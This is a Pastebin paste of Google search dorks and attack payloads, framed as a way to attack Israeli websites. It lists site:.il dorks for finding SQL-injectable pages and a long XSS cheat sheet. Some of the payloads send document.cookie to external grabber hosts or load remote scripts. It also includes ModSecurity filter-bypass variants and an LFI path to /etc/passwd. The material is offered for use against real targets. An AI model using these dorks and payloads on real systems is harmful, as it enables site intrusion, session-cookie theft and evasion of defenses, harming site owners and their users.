shreeshantkumar

SQLI DORKS

Aug 31st, 2018
47
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. XSS Dorks and Cheats XSS Dorks
  2. Google Dorks:
  3. I share with you some SQLI dorks for attacking
  4. Israel websites
  5. intext:"error in your SQL syntax" +site:il
  6. <p> intext:"mysql_num_rows()" +site:il</
  7. p><p> intext:"mysql_fetch_array()" +site:il</
  8. p><p> intext:"Error Occurred While Processing
  9. Request" +site:il</p><p> intext:"Server Error in
  10. '/' Application" +site:il</p><p> intext:"Microsoft
  11. OLE DB Provider for ODBC Drivers error"
  12. +site:il</p><p> intext:"Invalid Querystring"
  13. +site:il</p><p> intext:"OLE DB Provider for
  14. ODBC" +site:il</p><p> intext:"VBScript
  15. Runtime" +site:il</p><p> intext:"ADODB.Field"
  16. +site:il</p><p> intext:"BOF or EOF" +site:il</
  17. p><p> intext:"ADODB.Command" +site:il</
  18. p><p> intext:"JET Database" +site:il</p><p>
  19. intext:"mysql_fetch_row()" +site:il</p><p>
  20. intext:"Syntax error" +site:il</p><p>
  21. intext:"include()" +site:il </p><p>
  22. intext:"mysql_fetch_assoc()" +site:il</p><p>
  23. intext:"mysql_fetch_object()" +site:il</p><p>
  24. intext:"mysql_numrows()" +site:il</p><p>
  25. intext:"GetArray()" +site:il</p><p>
  26. intext:"FetchRow()" +site:il</p> intext:"Input
  27. string was not in a correct format" +site:il
  28. Using "site:.il" will limit the search to only Israel
  29. domains.
  30. Use SQLi dorks and just add "site:.il" to the
  31. begining of the query,
  32. example below:
  33. site:.il inurl:news?id=
  34. site:.il inurl:viewshowdetail.php?id=
  35. site:.il inurl:clubpage.php?id=
  36. site:.il inurl:memberInfo.php?id=
  37. site:.il inurl:section.php?id=
  38. site:.il inurl:theme.php?id=
  39. site:.il inurl:page.php?id=
  40. site:.il inurl:shredder-categories.php?id=
  41. site:.il inurl:tradeCategory.php?id=
  42. site:.il inurl:product_ranges_view.php?ID=
  43. site:.il inurl:shop_category.php?id=
  44. site:.il inurl:transcript.php?id=
  45. Code:
  46. inurl:".php?cmd="
  47. inurl:".php?z="
  48. inurl:".php?q="
  49. inurl:".php?search="
  50. inurl:".php?query="
  51. inurl:".php?searchstring="
  52. inurl:".php?keyword="
  53. inurl:".php?file="
  54. inurl:".php?years="
  55. inurl:".php?txt="
  56. inurl:".php?tag="
  57. inurl:".php?max="
  58. inurl:".php?from="
  59. inurl:".php?author="
  60. inurl:".php?pass="
  61. inurl:".php?feedback="
  62. inurl:".php?mail="
  63. inurl:".php?cat="
  64. inurl:".php?vote="
  65. inurl:search.php?q=
  66. inurl:com_feedpostold/feedpost.php?url=
  67. inurl:scrapbook.php?id=
  68. inurl:headersearch.php?sid=
  69. inurl:/poll/default.asp?catid=
  70. inurl:/search_results.php?search=
  71. XSS Cheats
  72. Code:
  73. '';!--"<XSS>=&{()}
  74. '>//\\,<'>">">"*"
  75. '); alert('XSS
  76. <script>alert(1);</script>
  77. <script>alert('XSS');</script>
  78. <IMG SRC="javascript:alert('XSS');">
  79. <IMG SRC=javascript:alert('XSS')>
  80. <IMG SRC=JaVaScRiPt:alert('XSS')>
  81. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  82. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  83. <script src=" http://www.evilsite.org/
  84. cookiegrabber.php "></script>
  85. <script>location.href=" http://www.evilsite.org/
  86. cookiegrabber.php?cookie= "+escape(docume
  87. nt.cookie)</script>
  88. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  89. <script>alert(String.fromCharCode(88,83,83))</
  90. script>
  91. <img src=foo.png onerror=alert(/xssed/) />
  92. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</
  93. style>
  94. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?
  95. >
  96. <marquee><script>alert('XSS')</script></marquee>
  97. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  98. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  99. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  100. <IMG SRC=javascript:alert(String.fromCharCode
  101. (88,83,83))>
  102. "><script>alert(0)</script>
  103. <script src= http://yoursite.com/your_files.js ></
  104. script>
  105. </title><script>alert(/xss/)</script>
  106. </textarea><script>alert(/xss/)</script>
  107. <IMG LOWSRC=\"javascript:alert('XSS')\">
  108. <IMG DYNSRC=\"javascript:alert('XSS')\">
  109. <font style='color:expression(alert(document.cookie
  110. ))'>
  111. <img src="javascript:alert('XSS')">
  112. <script language="JavaScript">alert('XSS')</script>
  113. <body onunload="javascript:alert('XSS');">
  114. <body onLoad="alert('XSS');"
  115. [color=red' onmouseover="alert('xss')"]mouse over
  116. [/color]
  117. "/></a></><img src=1.gif onerror=alert(1)>
  118. window.alert("Bonjour !");
  119. <div style="x:expression((window.r==1)?'':eval('r=1;
  120. alert(String.fromCharCode(88,83,83));'))">
  121. <iframe<?php echo chr(11)?> onload=alert('X
  122. SS')></iframe>
  123. "><script alert(String.fromCharCode(88,83,83))</
  124. script>
  125. '>><marquee><h1>XSS</h1></marquee>
  126. '">><script>alert('XSS')</script>
  127. '">><marquee><h1>XSS</h1></marquee>
  128. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url
  129. =javascript:alert('XSS');\">
  130. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
  131. URL=http://;URL=javascript:alert('XSS');\">
  132. <script>var var = 1; alert(var)</script>
  133. <STYLE type="text/css">BODY{background:url
  134. ("javascript:alert('XSS')")}</STYLE>
  135. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  136. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  137. " onfocus=alert(document.domain) "> <"
  138. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');
  139. \"></FRAMESET>
  140. <STYLE>li {list-style-image: url(\"javascript:alert
  141. ('XSS')\");}</STYLE><UL><LI>XSS
  142. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR
  143. \0IPT>\";' > out
  144. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\"
  145. )>\";' > out
  146. <br size=\"&{alert('XSS')}\">
  147. <scrscriptipt>alert(1)</scrscriptipt>
  148. </br style=a:expression(alert())>
  149. </script><script>alert(1)</script>
  150. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert
  151. ("XSS")>
  152. [color=red width=expression(alert(123))][color]
  153. <BASE HREF="javascript:alert('XSS');//">
  154. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  155. "></iframe><script>alert(123)</script>
  156. <body onLoad="while(true) alert('XSS');">
  157. '"></title><script>alert(1111)</script>
  158. </textarea>'"><script>alert(document.cookie)</
  159. script>
  160. '""><script language="JavaScript"> alert('X \nS
  161. \nS');</script>
  162. </script></script><<<<script><>>>><<<script>alert
  163. (123)</script>
  164. <html><noalert><noscript>(123)</noscript><script>
  165. (123)</script>
  166. <INPUT TYPE="IMAGE" SRC="javascript:alert
  167. ('XSS');">
  168. '></select><script>alert(123)</script>
  169. '>"><script src = ' http://www.site.com/XSS.js '></
  170. script>
  171. }</style><script>a=eval;b=alert;a(b(/XSS/
  172. .source));</script>
  173. <SCRIPT>document.write("XSS");</SCRIPT>
  174. a="get";b="URL";c="javascript:";d="alert('xss
  175. ');";eval(a+b+c+d);
  176. ='><script>alert("xss")</script>
  177. <script+src=">"+src=" http://yoursite.com/xss.js?
  178. 69,69 "></script>
  179. <body background=javascript:'"><script>alert
  180. (navigator.userAgent)</script>></body>
  181. ">/XaDoS/><script>alert(document.cookie)</
  182. script><script src=" http://www.site.com/XSS.js "></
  183. script>">/KinG-InFeT.NeT/><script>alert(d
  184. ocument.cookie)</script>
  185. src=" http://www.site.com/XSS.js "></script>
  186. data:text/html;charset=utf-7;base64,Ij48L
  187. 3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTM
  188. zNyk8L3NjcmlwdD4=
  189. !--" /><script>alert('xss');</script>
  190. <script>alert("XSS by \nxss")</script><marquee>
  191. <h1>XSS by xss</h1></marquee>
  192. "><script>alert("XSS by \nxss")</script>><marquee
  193. ><h1>XSS by xss</h1></marquee>
  194. '"></title><script>alert("XSS by \nxss")</
  195. script>><marquee><h1>XSS by xss</h1></
  196. marquee>
  197. <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  198. <script>alert(1337)</script><marquee><h1>XSS by
  199. xss</h1></marquee>
  200. "><script>alert(1337)</script>"><script>alert("XSS
  201. by \nxss</h1></marquee>
  202. '"></title><script>alert(1337)</script>><marquee
  203. ><h1>XSS by xss</h1></marquee>
  204. <iframe src="javascript:alert('XSS by \nxss');"></
  205. iframe><marquee><h1>XSS by xss</h1></marquee>
  206. <iframe src= http://othersite/sb.php >
  207.  
  208. Test reflected Xss
  209.  
  210. %22onmouseover%3d%27alert
  211. %28%22immuniweb%22%29%27%20a%3d
  212. %22%3E
  213.  
  214. ModSecurity Filters bypass
  215.  
  216. The filter will catch:
  217. <img src="x:gif" onerror="alert(0)">
  218. but miss:
  219. <img src="x:alert" onerror="eval(src '(0)')">
  220. and
  221. <img src="x:gif" onerror="eval('al' 'lert(0)')">
  222. and
  223. <img src="x:gif" onerror="window['alu0065rt']
  224. (0)"></img>
  225. The filter will catch:
  226. ";document.write('<img src=http://p42.us/x.png?'
  227. document.cookie '>');"
  228. but miss:
  229. ";document.write('<img sr' 'c=http://p42.us/x.png?'
  230. document['cookie'] '>');"
  231. LFI
  232. /foo/../etc/bar/../passwd
Add Comment
Please, Sign In to add comment